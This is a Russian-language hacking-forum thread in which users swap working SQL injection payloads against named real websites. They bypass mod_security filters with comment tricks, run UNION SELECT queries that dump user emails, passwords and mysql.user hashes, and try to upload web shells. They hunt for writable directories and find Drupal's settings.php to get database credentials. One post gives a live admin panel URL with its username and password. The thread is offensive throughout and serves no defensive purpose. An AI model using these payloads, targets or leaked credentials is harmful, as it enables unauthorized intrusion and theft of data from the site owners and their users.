Я не увидел, хотя возможно не там искал, ведь я скептически отношусь к разработкам автора :) если и правда есть, покажи будь так добр

) ми уже усовершенствовал скрипт децл, спешиал фор $n@ke, скоро будут выложены обновления в соответствующей теме

Спасибо.Toolza уже работает отлично!))

ребят вот так я обошел фильтрацию на union select

id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,3,4

но тут еще есть фильтрация на information_schema, а как с этим быть?

ребят вот так я обошел фильтрацию на union select

id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,3,4

но тут еще есть фильтрация на information_schema, а как с этим быть?
Oбходится также: from/*!information_schema.tables*/
Кстати, обычно чтобы обойти данную фильтрацию (mod_security), достаточно заключить в комментарии один из операторов. Например /*!union*/select

id=2/**/and/**/1=0/**//*!union+select+1,2,table_name,4+from+information_s chema.tables*/--

Iceangel_ & pinch

не катит (

вот интересно information_schema.columns работает а information_schema.tables не работает

брутил имя таблицы "member"

и вот такой запрос получилось

id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,column_name,4+from+/*!information_schema.columns*/+/*!where*/+/*!table_name*/=/*!CHAR*/(109,101,109,98,101,114)

...

Hasta la vista baby

id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,aes_decrypt(aes_encrypt(concat(Email,0x3a,Pas sword),1),1),4+from+/*!member*/

:)

есть sql, хочу создать пхп файл

1. file_priv=Y
2. magic_quotes_gpc=off
3. есть полный путь
4. есть папка icons

читаю файлики с помощью load_file, но создать файл не выходит в чем может быть проблема?

pinch

a в папке icons есть права на запись? :)

видимо нет=))) что можно сделать, поискать папки на запись? или можно еще чтото сделать?

видимо нет=))) что можно сделать, поискать папки на запись? или можно еще чтото сделать?


первый вариант, смотри на папки типа template

pinch, посканьте сайт каким-нить сканером директорий, затем методом тыка поищите каталог на запись

pinch посмотри если сайт на кмс построен, соответсвенно скачай и посмотри какие папки есть и пробуй всe, ну и конечно пробуй папки: store, tmp,temp,img,im,admin,adm,cache,images,upl,uploads ........etc... если в них нет ограничений по исполнению в .htaccess

pinch

если система linux то попробуй записать в папке /tmp
думаю права хватит

tmp хорошо, но никак не задействовать допустим шелл из этой папки... если не ошибаюсь только при помощи локального инклуда.

tmp хорошо, но никак не задействовать допустим шелл из этой папки... если не ошибаюсь только при помощи локального инклуда.

сканируй директории сайта IntelliTamper-ом

является ли уязвимым сайт, выдающий на кавычку в первом случае:
Database error: Invalid SQL: SELECT ID, subcat, image FROM product_subcats WHERE categoryID = 6' ORDER BY ord
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY ord' at line 1)

во втором случае:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
???

DrakonSerg а кто его знает то? были пару экстрасенсов на ачате, да некоторые в бане от Егорыча так как постоянно его пароль узнавали, а некоторые еще не знают что они экстрасенсы...
У меня машина не едет, как ты думаешь что в ней сломалось?

DrakonSerg а кто его знает то? были пару экстрасенсов на ачате, да некоторые в бане от Егорыча так как постоянно его пароль узнавали, а некоторые еще не знают что они экстрасенсы...
У меня машина не едет, как ты думаешь что в ней сломалось?
машина не едет, значит что то сломано. То есть осталось поломку только найти, то что она есть уже железно.
По выдачи этих ошибок возможность инъекции не определить? А как можно определить? Очень сайт нужен тот...

news.php?id=1
news.php?id=2-1 если выдается та же страница что и при id=1 то уязвимость есть

news.php?id=1
news.php?id=2-1 если выдается та же страница что и при id=1 то уязвимость есть
это точно? Выдается та же страница. Чем эту уязвимость можно крутонуть автоматически?
Вы звиняйте за нубские вопросы. Никогда как то не приходилось с sql плотно стыкаться.

1) содержимое страницы не должно изменяться (картинки соответственно).
2) sipt 4.0
pangolin
sqlhelper
toolza

http://www.mustad.no/catalog/products.php?id=
Это PHP-инъекция? Можно ли как нибудь залить шелл?

sqlihelper 2.7 выдал:
Mysql is version 4 please brute either tables or columns
Mysql is version 4 now bruting tables
я так понял нужно брутить названия колонок в таблице. Как?

CyberHunter, да, это инклуд, но, скорее всего, файл для инклуда берется из поля БД, id которого - твой GET параметр.
DrakonSerg, да, надо брутить, т.к., судя по логам, ветка 4-я, в которой нету information_schema.

mailbrush, т.е. вот так:
http://www.mustad.no/catalog/products.php?id=adress_gde_shell
но так появляется ошибка (та же самая). Пробовал подставлять нулл байт, не помогло.

не факт что там allow_url_include=on
не факт что там magic_quotes_gpc=off (попробуй вместо нулл байта ?)

Работа SQLI Helper V 2.7
Get Server Info
Check if URL is Vulnerable
URL is Vulnerable
Check No. of Columns
No. of columns : 1
Check No. of Columns - finished
Looking for larget text visible column
Col num 1 found
Check if supports union
Check if supports union - finished
Check Current user
Check Current user - finished
Check if database version
Check if database version - finished
Check Current Database
Check current database - finished
Checking LoadFile
Check Load File - finished

при Get Database:
Mysql is version 4 please brute either tables or columns
при Get Tables:
Mysql is version 4 please brute either tables or columns
при Get Collumns:
ничего, так как таблица не выбрана.

вывод этого же хелпера:
host Information Value

Server Apache/2.0.52(Red Hat)
Version 4.1.22
Powered by PHP/5.2.11
Attack Type SQL Union Injection
Current User blablabla@localhost
Current Database namebaseBS
Supports Union yes
Union Columns 1

чем брутить таблицу? Как до нее вообще добраться?

не факт что там allow_url_include=on
не факт что там magic_quotes_gpc=off (попробуй вместо нулл байта ?)
А ничего, что там инклуда вообще нет? Что бы ни ставилии в id, в ошибке оно не инклудится

Не могу залить шелл.

админка:http://zoor.biz/user/

Username:zbo_admin
password:shaka13

Не могу залить шелл.

http://zoor.biz/company.php?cn=ARSHAD+RASHEED+MUGHAL+PLASTIC+STORE&id=-6019+union+select+1,2,3,concat_ws(0x3a,uid,
name,
pass,
mail,
mode,
sort,
threshold,
theme,
signature,
signature_format,
created,
access,
login,
status,
timezone,
language,
picture,
init,
data),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +hashoo_zbo.users+limit+1,1+--+

Не могу залить шелл.

http://zoor.biz/company.php?cn=ARSHAD+RASHEED+MUGHAL+PLASTIC+STORE&id=-6019+union+select+1,2,3,concat_ws(0x3a,uid,
name,
pass,
mail,
mode,
sort,
threshold,
theme,
signature,
signature_format,
created,
access,
login,
status,
timezone,
language,
picture,
init,
data),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +hashoo_zbo.users+limit+1,1+--+


В ПМ кинул!!

Блин, ну натолкните на идею или статью... Я уже задолбался.
Вытащил имя и версию дб. Колонки нужно брутить, как их брутить я вообще хз.
Pangolin.Pro.v3.0.0.1011 выдал мне имена колонок каких то, но как оттуда данные вытащить я тоже не пойму. По какому мне запросу гуглить, чтобы вникнуть в ситуацию?

ЗЫ кто хочет помочь, посмотрите два мои поста выше, понятней будет

НАпротив акка root вот такой хеш: 3649d1fc783e0b49

Пара вопросов по php, во первых, как через php inj найти директории на запись и вывести их на экран?
консольная команда find / -type d -perm 2 не пашет почти нигде, с учётом что системные команды выполняются нормально.

Далее столкнулся с такой траблой, что ни в одну директорию нельзя залить\создать файл, хотя права там полные, пробовал через fopen (далее конструкция fputs и т.д..), пробовал через copy, и через wget, всё одно и тоже, даже через echo пробовал создать тестовый файл в директории... как будто записи нету, хотя права на запись есть.
Таких сайтов много, все разные и друг с другом не связаны (их лишь связывает общяя уязвимость remote code), но ни на одном файлов не создать.
Инклуд так-же не пашет, шелл полностью нефункциональный. Может посоветуете что.

Блин, ну натолкните на идею или статью... Я уже задолбался.
Вытащил имя и версию дб. Колонки нужно брутить, как их брутить я вообще хз.
Pangolin.Pro.v3.0.0.1011 выдал мне имена колонок каких то, но как оттуда данные вытащить я тоже не пойму. По какому мне запросу гуглить, чтобы вникнуть в ситуацию?

ЗЫ кто хочет помочь, посмотрите два мои поста выше, понятней будет

по этому нужно работать руками а не программами!

tables-- select+group_concat(table_name)+from+information_s chema.tables--

columns-- select+group_concat(column_name)+from_information_ schema.columns+where+table_name="yourtable"

НАпротив акка root вот такой хеш: 3649d1fc783e0b49

hash type: MySQL

не твой сайт что ли?

http://www.southworth.com/page.php?id=-5+union+select+group_concat(user,0x3a,password,0x3 c42723e)+from+mysql.user

Пара вопросов по php, во первых, как через php inj найти директории на запись и вывести их на экран?
консольная команда find / -type d -perm 2 не пашет почти нигде, с учётом что системные команды выполняются нормально.


Nightmare это тоже не катит?

print(`find / -type d -perm 2`)

Nightmare это тоже не катит?

print(`find / -type d -perm 2`)
к сожалению тоже ничего не выводит на экран ;(

Пара вопросов по php, во первых, как через php inj найти директории на запись и вывести их на экран?
консольная команда find / -type d -perm 2 не пашет почти нигде, с учётом что системные команды выполняются нормально.

Далее столкнулся с такой траблой, что ни в одну директорию нельзя залить\создать файл, хотя права там полные, пробовал через fopen (далее конструкция fputs и т.д..), пробовал через copy, и через wget, всё одно и тоже, даже через echo пробовал создать тестовый файл в директории... как будто записи нету, хотя права на запись есть.
Таких сайтов много, все разные и друг с другом не связаны (их лишь связывает общяя уязвимость remote code), но ни на одном файлов не создать.
Инклуд так-же не пашет, шелл полностью нефункциональный. Может посоветуете что.

find / -perm -2 -type d -ls

Блин, ну натолкните на идею или статью... Я уже задолбался.
Вытащил имя и версию дб. Колонки нужно брутить, как их брутить я вообще хз.
Pangolin.Pro.v3.0.0.1011 выдал мне имена колонок каких то, но как оттуда данные вытащить я тоже не пойму. По какому мне запросу гуглить, чтобы вникнуть в ситуацию?

ЗЫ кто хочет помочь, посмотрите два мои поста выше, понятней будет

НАпротив акка root вот такой хеш: 3649d1fc783e0b49

искать не пробывал?

https://forum.antichat.ru/threadnav43966-1-10.html
https://forum.antichat.ru/thread19844.html

А кто подскажет где в движках Drupal хранятся логин и пароль от БД?

А кто подскажет где в движках Drupal хранятся логин и пароль от БД?
Drupal
www.site.com/admin/
users
uid
name
pass
mail
login

Gorev Я имел в виду в исходниках (.php)

Gorev Я имел в виду в исходниках (.php)

причем тут php? пароли хранятся в бд

Konqi А так же в файлах на подобии config.php...
Толь в движках Drupal таких файлов нету!!

Konqi А так же в файлах на подобии config.php...
Толь в движках Drupal таких файлов нету!!


значит в движке друпал пароли хранятся только в бд :P

значит в движке друпал пароли хранятся только в бд :P

мда
ему нужен файл где хранится хост\логин\пасс для коннекта к бд

:.']мда
ему нужен файл где хранится хост\логин\пасс для коннекта к бд

ну в джумле это configuration.php a в друпал такое есть? не знаю :rolleyes:

.:[melkiy]:. Ну хоть до кого то дошло!!

Konqi В друпал таких файлов нету, вот поэтому и спрашиваю!

2 Konqi как можно угадать сайт без малейших намеков? )) или совпадение, или ты экстрасенс, блин... ))
Есть вариант от админки пасс вытащить?

2 Konqi как можно угадать сайт без малейших намеков? )) или совпадение, или ты экстрасенс, блин... ))
Есть вариант от админки пасс вытащить?


даю гарантию что твой сайт уже несколько раз поимели,в кэше googla хранится, а по поводу админки даже не смотрел

.:[melkiy]:. Ну хоть до кого то дошло!!

Konqi В друпал таких файлов нету, вот поэтому и спрашиваю!

В Друпал
./sites/default/settings.php

А кто подскажет где в движках Drupal хранятся логин и пароль от БД?
файл /sites/default/settings.php а информация в переменной $db_url

является ли уязвимым сайт, выдающий на кавычку в первом случае:


во втором случае:

???
вбей 'abcd, если abcd в ошибке будет, то крути.

Насчёт drupal, смотри /sites/название сайта, а вообще может быть любое/settings.php
В default редко бывают доступы.

Скажите как проверить file_priv?
Вот например инъекция:
http://germanfirms.ru/products.php?id=63+union+select+1+--+
Делаю так:
http://germanfirms.ru/products.php?id=63+union+select+file_priv+from+mys ql.user+where+user='db156426_4'+--+
Не выводит ни 'Y' ни 'N'. Что не так?
И как я понимаю, если будет 'Y', то можно будет залить файл?

Скажите как проверить file_priv?
Вот например инъекция:
http://germanfirms.ru/products.php?id=63+union+select+1+--+
Делаю так:
http://germanfirms.ru/products.php?id=63+union+select+file_priv+from+mys ql.user+where+user='db156426_4'+--+
Не выводит ни 'Y' ни 'N'. Что не так?
И как я понимаю, если будет 'Y', то можно будет залить файл?

попробуй таблицу users
там админ

biophys.am
если мойно помоqите наыти админку